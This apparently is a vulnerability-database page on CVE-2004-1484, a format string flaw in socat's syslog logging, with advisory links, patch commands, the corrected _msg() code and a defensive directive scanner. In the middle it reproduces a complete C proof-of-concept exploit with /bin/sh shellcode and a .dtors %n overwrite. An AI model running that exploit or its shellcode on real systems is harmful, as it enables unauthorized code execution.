CVE-2004-1484
CVSS5.0
Published: 2004-12-31 00:00:00
Last revised: 2008-09-05 16:41:31
NMCOE    

[Original] Format string vulnerability in the _msg function in error.c in socat 1.4.0.3 and earlier, when used as an HTTP proxy client and run with the -ly option, allows remote attackers or local users to execute arbitrary code via format string specifiers in a syslog message.


[CNNVD] Socat remote format string vulnerability (CNNVD-200412-449)

        A format string vulnerability exists in the _msg function in error.c in socat 1.4.0.3 and earlier when it is used as an HTTP proxy client and run with the -ly option. Remote attackers or local users can execute arbitrary code via format string specifiers in a syslog message.

- CVSS (base score)

CVSS score: 5 [MEDIUM]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Access complexity: LOW [no access restrictions on exploitation]
Access vector: [--]
Authentication: NONE [no authentication required to exploit]

- CPE (affected platforms and products)

cpe:/a:socat:socat:1.0.4.2
cpe:/a:socat:socat:1.4.0.1
cpe:/a:socat:socat:1.3.0.1
cpe:/a:socat:socat:1.0.3.0
cpe:/a:socat:socat:1.4.0.2
cpe:/a:socat:socat:1.4.0.0
cpe:/a:socat:socat:1.1.0.1
cpe:/a:socat:socat:1.3.2.0
cpe:/a:socat:socat:1.3.2.2
cpe:/a:socat:socat:1.3.0.0
cpe:/a:socat:socat:1.2.0.0
cpe:/a:socat:socat:1.3.2.1
cpe:/a:socat:socat:1.0.4.1
cpe:/a:socat:socat:1.0.4.0
cpe:/a:socat:socat:1.1.0.0
cpe:/a:socat:socat:1.3.1.0

- OVAL (technical details for detection)

No related OVAL definition found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1484
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1484
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-449
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/17822
(PATCH)  XF  socat-format-string(17822)
http://www.securityfocus.com/bid/11505
(PATCH)  BID  11505
http://www.nosystem.com.ar/advisories/advisory-07.txt
(VENDOR_ADVISORY)  MISC  http://www.nosystem.com.ar/advisories/advisory-07.txt
http://www.gentoo.org/security/en/glsa/glsa-200410-26.xml
(VENDOR_ADVISORY)  GENTOO  GLSA-200410-26
http://secunia.com/advisories/12936/
(VENDOR_ADVISORY)  SECUNIA  12936
http://www.dest-unreach.org/socat/advisory/socat-adv-1.html
(VENDOR_ADVISORY)  CONFIRM  http://www.dest-unreach.org/socat/advisory/socat-adv-1.html

- Vulnerability information

Socat remote format string vulnerability
Medium severity | Format string
2004-12-31 00:00:00 2005-10-20 00:00:00
Remote
        A format string vulnerability exists in the _msg function in error.c in socat 1.4.0.3 and earlier when it is used as an HTTP proxy client and run with the -ly option. Remote attackers or local users can execute arbitrary code via format string specifiers in a syslog message.

- Advisories and patches

        The vendor has released a new version of the package to address this issue.

        Gentoo has released an advisory (GLSA 200410-26) to address this issue. Please see the referenced advisory for more information. Gentoo users may carry out the following actions to update their computers:
        emerge --sync
        emerge --ask --oneshot --verbose ">=net-misc/socat-1.4.0.3"

        Affected (vendor / product / version):
        socat  socat  1.0.x
        socat  socat  1.1.x
        socat  socat  1.2.x
        socat  socat  1.3.x
        socat  socat  1.4.0.0
        socat  socat  1.4.0.1
        socat  socat  1.4.0.2

- Vulnerability information (591)

socat <= 1.4.0.2 Local Format String Exploit (not setuid) (EDBID:591)
linux local
2004-10-23 Verified
0 CoKi
N/A
/* socat_exp.c

   Socat Format String Vulnerability

   socat <= 1.4.0.2 local exploit (Proof of Concept)

   Tested in Slackware 9.0 / 9.1 / 10.0

   by CoKi <coki@nosystem.com.ar>
   No System Group - http://www.nosystem.com.ar
   
coki@servidor:~$ make socat_exp
coki@servidor:~$ ./socat_exp

 socat <= 1.4.0.2 local exploit (Proof of Concept)
 by CoKi <coki@nosystem.com.ar>

 shellcode address = 0xbfffffb9
 .dtors address    = 0x080740c4

2004/10/19 09:49:46 socat[26197] E unknown syslog facility
"ÄÅÆÇ%142u%30$n%70u%31$n%256u%32$n%192u%33$n"
sh-2.05b$

This exploit does not give a root shell :(   
*/

#include <stdio.h>
#include <stdlib.h>     /* exit(), atoi() */
#include <string.h>
#include <strings.h>    /* bzero() */
#include <unistd.h>     /* execle() */

#define PATH "/usr/local/bin/socat"
#define OBJDUMP "/usr/bin/objdump"
#define GREP "/usr/bin/grep"

unsigned char shellcode[]=  /* aleph1 shellcode.45b */
        "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c"
        "\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb"
        "\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e"
        "\x2f\x73\x68";

int check(unsigned long addr);

int main(int argc, char *argv[]) {

        int i, dtorsaddr;
        unsigned int bal1, bal2, bal3, bal4;
        char temp[512];
        char buffer[1024];
        int cn1, cn2, cn3, cn4;
        FILE *f;
        char *env[3] = {shellcode, NULL};
        int shaddr = 0xbffffffa - strlen(shellcode) - strlen(PATH);

        sprintf(temp, "%s -s -j .dtors %s | %s ffffffff", OBJDUMP, PATH, GREP);
        f = popen(temp, "r");
        if(fscanf(f, " %08x", &dtorsaddr) != 1) {
                pclose(f);
                printf("Cannot find .dtors address\n");
                exit(1);
        }
        pclose(f);
        dtorsaddr = dtorsaddr + 4;

        printf("\n socat <= 1.4.0.2 local exploit (Proof of Concept)\n");
        printf(" by CoKi <coki@nosystem.com.ar>\n\n");
        printf(" shellcode address = %.8p\n", shaddr);
        printf(" .dtors address    = %.8p\n\n", dtorsaddr);

        bzero(temp, sizeof(temp));
        bzero(buffer, sizeof(buffer));

        strcat(buffer, "-ly");

        for(i = 0; i < 4; i++) {
                bzero(temp, sizeof(temp));
                sprintf(temp, "%s", &dtorsaddr);
                strncat(buffer, temp, 4);
                dtorsaddr++;
        }

        bal1 = (shaddr & 0xff000000) >> 24;
        bal2 = (shaddr & 0x00ff0000) >> 16;
        bal3 = (shaddr & 0x0000ff00) >>  8;
        bal4 = (shaddr & 0x000000ff);

        cn1 = bal4 - 27 - 16;
        cn1 = check(cn1);
        cn2 = bal3 - bal4;
        cn2 = check(cn2);
        cn3 = bal2 - bal3;
        cn3 = check(cn3);
        cn4 = bal1 - bal2;
        cn4 = check(cn4);

        sprintf(temp, "%%%du%%30\$n%%%du%%31\$n%%%du%%32\$n%%%du%%33\$n", cn1, cn2, cn3, cn4);

        strcat(buffer, temp);

        execle(PATH, "socat", buffer, NULL, env);
}

int check(unsigned long addr) {
        char tmp[128];
        snprintf(tmp, sizeof(tmp), "%d", addr);
        if(atoi(tmp) < 1)
                addr = addr + 256;

        return addr;
}

// milw0rm.com [2004-10-23]
		

- Vulnerability information

11035
socat error.c _msg() Function Remote Format String
Local Access Required, Remote / Network Access, Local / Remote, Context Dependent Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

socat contains a flaw that may allow local or remote attackers to gain unauthorized privileges. A local attacker could trigger this issue when socat is listening on a UNIX domain socket: anyone with permission to connect to the socket could pass malicious data that leads to arbitrary code execution. A remote attacker could trigger this issue when a system user runs socat as an HTTP proxy client and the attacker spoofs the proxy server to which socat connects; the attacker could then pass malicious data that leads to arbitrary code execution. Both flaws may lead to a loss of integrity. Note: to successfully exploit either the local or the remote vulnerability, socat must be run with the "-ly" option enabled. Additionally, to exploit the local vulnerability socat must log at debug level 2 or higher.

- Timeline

2004-10-18 Unknown
2004-10-18 Unknown

- Solution

Upgrade to version 1.4.0.3 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s):
1) Disable logging to syslog by not using the "-ly" option when starting socat.
2) Change the _msg() function in error.c to:

--------------------- corrected error.c _msg() function ---------------------
static void _msg(int level, const char *buff, const char *syslp) {
   if (diagopts.logstderr) {
      fputs(buff, stderr); fflush(stderr);
   }
   if (diagopts.syslog) {
      syslog(syslevel[level], "%s", syslp);   // <--- here
   }
   if (diagopts.logfile) {
      fputs(buff, diagopts.logfile); fflush(diagopts.logfile);
   }
}
--------------------- corrected error.c _msg() function ---------------------
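The fix above comes down to one rule: a string built from untrusted input may be an argument to a printf-family or syslog call, never its format. The block below is an added example written for this page, not socat's own error.c code. It shows the corrected one-argument sink and a small directive scanner an auditor can run over a message that reached a non-constant format, to tell whether the message would have been interpreted at all and whether it carried memory-writing "%n" or positional "%N$" directives. Assumptions: snprintf() into a buffer stands in for syslog() so the example runs offline, and scan_format_directives(), format_msg_fixed(), fixed_sink_is_literal() and POC_FORMAT_TAIL are names chosen here; POC_FORMAT_TAIL is the format-specifier tail of the proof-of-concept message shown on this page, used only as test input.

```c
/* Added example, not socat's code: the logging-sink shape behind CVE-2004-1484
 * and a defender-side check for it.
 *
 * In socat <= 1.4.0.2, _msg() in error.c handed a diagnostic string built
 * from untrusted input to syslog() as the *format* argument, so "%n" and
 * positional "%N$" directives in the message were interpreted.  The 1.4.0.3
 * fix passes a constant format instead: syslog(level, "%s", syslp).
 *
 * Assumptions: snprintf() stands in for syslog() so this runs offline; the
 * function and macro names below are this example's own, not socat's. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Format-specifier tail of the proof-of-concept message shown on this page
 * (the four leading address bytes are omitted); used only as test input. */
#define POC_FORMAT_TAIL "%142u%30$n%70u%31$n%256u%32$n%192u%33$n"

struct fmt_report {
    int directives;  /* conversions that would consume a vararg */
    int writes;      /* "%n" conversions, which write an integer to memory */
    int positional;  /* directives using the "%N$" argument selector */
};

/* Parse a string the way a printf-family implementation would and count what
 * it would interpret.  This tells an auditor whether a message that reached a
 * non-constant format argument was actually dangerous; it is not a substitute
 * for the constant-format fix. */
struct fmt_report scan_format_directives(const char *s)
{
    struct fmt_report r = {0, 0, 0};
    const char *p = s;

    while ((p = strchr(p, '%')) != NULL) {
        const char *q = p + 1;
        if (*q == '%') {                             /* "%%" is a literal percent */
            p = q + 1;
            continue;
        }
        while (isdigit((unsigned char)*q)) q++;      /* "N$" position, or width */
        if (*q == '$') { r.positional++; q++; }
        while (*q && strchr("-+ #0", *q)) q++;       /* flags */
        while (isdigit((unsigned char)*q) || *q == '*') q++;   /* width */
        if (*q == '.') {                              /* precision */
            q++;
            while (isdigit((unsigned char)*q) || *q == '*') q++;
        }
        while (*q && strchr("hlLqjzt", *q)) q++;     /* length modifiers */
        if (*q == '\0')
            break;                                   /* truncated directive */
        if (strchr("diouxXeEfFgGaAcspn", *q)) {
            r.directives++;
            if (*q == 'n')
                r.writes++;
        }
        p = q + 1;
    }
    return r;
}

/* The corrected sink: the message is an argument, never the format, so
 * whatever it contains is copied literally. */
int format_msg_fixed(char *out, size_t n, const char *syslp)
{
    return snprintf(out, n, "%s", syslp);
}

/* Returns 1 if the fixed sink reproduces the message byte for byte. */
int fixed_sink_is_literal(const char *msg)
{
    char out[256];
    format_msg_fixed(out, sizeof out, msg);
    return strcmp(out, msg) == 0;
}

int main(void)
{
    struct fmt_report r = scan_format_directives(POC_FORMAT_TAIL);
    char out[256];

    printf("directives=%d  %%n writes=%d  positional=%d\n",
           r.directives, r.writes, r.positional);
    format_msg_fixed(out, sizeof out, POC_FORMAT_TAIL);
    printf("fixed sink logs: %s\n", out);
    return 0;
}
```

Run over the page's proof-of-concept tail, the scanner reports 8 directives, 4 of them "%n" writes and 4 positional, while the fixed sink logs the string unchanged; compiling with -Wformat-security catches the original shape (a non-literal format with no further arguments) at build time.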

- Related references

- Vulnerability credit

 

 
